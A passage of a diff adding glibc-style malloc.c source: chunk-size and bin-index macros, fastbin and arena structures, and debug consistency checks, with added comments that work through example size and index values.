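+   fd_nextsize, i.e. 4 * 8 = 32 bytes, which is already aligned, so
+   MINSIZE == 32.  On a typical 32-bit build both come out to 16.  */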
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
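+
+/* Worked example, assuming SIZE_SZ == 8, MALLOC_ALIGN_MASK == 0xf and
+   MINSIZE == 32: request2size (24) == (24 + 8 + 15) & ~15 == 32, and
+   request2size (0) falls below MINSIZE so it also yields 32.  Thus
+   user requests of 0..24 bytes all receive a 0x20-byte chunk.  */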
+
+/*  Same, except also perform argument check */
+
+#define checked_request2size(req, sz)                             \
+  if (REQUEST_OUT_OF_RANGE (req)) {					      \
+      __set_errno (ENOMEM);						      \
+      return 0;								      \
+    }									      \
+  (sz) = request2size (req);
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* check for chunk from non-main arena */
+#define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p)         ((p)->size & ~(SIZE_BITS))
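+
+/* Worked example: a size field of 0x91 encodes chunksize (p) == 0x90
+   with PREV_INUSE set and IS_MMAPPED/NON_MAIN_ARENA clear, i.e. a
+   0x90-byte chunk whose lower neighbour is in use.  */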
+
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))
+
+/* Ptr to previous physical malloc_chunk */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - ((p)->prev_size)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->size = (((p)->size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->prev_size = (s))
+
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (P->size)				      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr (check_action,				      \
+			       "corrupted double-linked list (not small)",    \
+			       P, AV);					      \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
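+
+/* Worked example, assuming SIZE_SZ == 8 (so SMALLBIN_WIDTH == 16 and
+   SMALLBIN_CORRECTION == 0): a 0x20-byte chunk is in small bin
+   smallbin_index (0x20) == 0x20 >> 4 == 2, small bins cover sizes
+   below MIN_LARGE_SIZE == 64 * 16 == 0x400, and a 0x400-byte chunk
+   lands in largebin_index_64 (0x400) == 48 + (0x400 >> 6) == 64.  */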
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
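+
+/* Worked example: bin index 70 lives in map word idx2block (70) ==
+   70 >> 5 == 2 at bit idx2bit (70) == 1U << (70 & 31) == 1U << 6, so
+   mark_bin (m, 70) sets bit 6 of m->binmap[2].  */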
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
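+
+/* Worked example, assuming SIZE_SZ == 8: the smallest chunk size,
+   0x20, maps to fastbin_index (0x20) == (0x20 >> 4) - 2 == 0 and a
+   0x80-byte chunk maps to index 6.  With MAX_FAST_SIZE == 160,
+   request2size (160) == 0xb0, so NFASTBINS == (0xb0 >> 4) - 2 + 1 == 10.  */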
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   Since the lowest 2 bits in max_fast don't matter in size comparisons,
+   they are used as flags.
+ */
+
+/*
+   FASTCHUNKS_BIT held in max_fast indicates that there are probably
+   some fastbin chunks. It is set true on entering a chunk into any
+   fastbin, and cleared only in malloc_consolidate.
+
+   The truth value is inverted so that have_fastchunks will be true
+   upon startup (since statics are zero-filled), simplifying
+   initialization checks.
+ */
+
+#define FASTCHUNKS_BIT        (1U)
+
+#define have_fastchunks(M)     (((M)->flags & FASTCHUNKS_BIT) == 0)
+#define clear_fastchunks(M)    catomic_or (&(M)->flags, FASTCHUNKS_BIT)
+#define set_fastchunks(M)      catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* ARENA_CORRUPTION_BIT is set if a memory corruption was detected on the
+   arena.  Such an arena is no longer used to allocate chunks.  Chunks
+   allocated in that arena before detecting corruption are not freed.  */
+
+#define ARENA_CORRUPTION_BIT (4U)
+
+#define arena_is_corrupt(A)	(((A)->flags & ARENA_CORRUPTION_BIT))
+#define set_arena_corrupt(A)	((A)->flags |= ARENA_CORRUPTION_BIT)
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks.
+   Setting the value clears fastchunk bit but preserves noncontiguous bit.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+#define get_max_fast() global_max_fast
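+
+/* Worked example, assuming SIZE_SZ == 8 and MALLOC_ALIGN_MASK == 0xf:
+   set_max_fast (DEFAULT_MXFAST) with DEFAULT_MXFAST == 128 stores
+   global_max_fast = (128 + 8) & ~0xf == 0x80, so chunk sizes up to
+   and including 0x80 are treated as fastbin-eligible.  */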
+
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  mutex_t mutex;
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  /*INTERNAL_SIZE_T  sbrked_mem;*/
+  /*INTERNAL_SIZE_T  max_sbrked_mem;*/
+  INTERNAL_SIZE_T max_mmapped_mem;
+  INTERNAL_SIZE_T max_total_mem;  /* only kept for NO_THREADS */
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+};
+
+
+/*  Non public mallopt parameters.  */
+#define M_ARENA_TEST -7
+#define M_ARENA_MAX  -8
+
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called only from within malloc_consolidate, which needs to
+   be called in the same contexts anyway.  It is never called directly
+   outside of malloc_consolidate because some optimizing compilers try
+   to inline it at all call points, which turns out not to be an
+   optimization at all. (Inlining it in malloc_consolidate is fine though.)
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  av->flags |= FASTCHUNKS_BIT;
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+
+/* ---------------- Error behavior ------------------------------------ */
+
+#ifndef DEFAULT_CHECK_ACTION
+# define DEFAULT_CHECK_ACTION 3
+#endif
+
+static int check_action = DEFAULT_CHECK_ACTION;
+
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((p->prev_size + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (next->prev_size == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more can be checked for free chunks than for inuse ones,
+     when an inuse chunk borders a free chunk and debugging is on,
+     it's worth checking the neighboring free chunks too.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_non_main_arena (p))
+        assert (av != &main_arena);
+      else
+        assert (av == &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
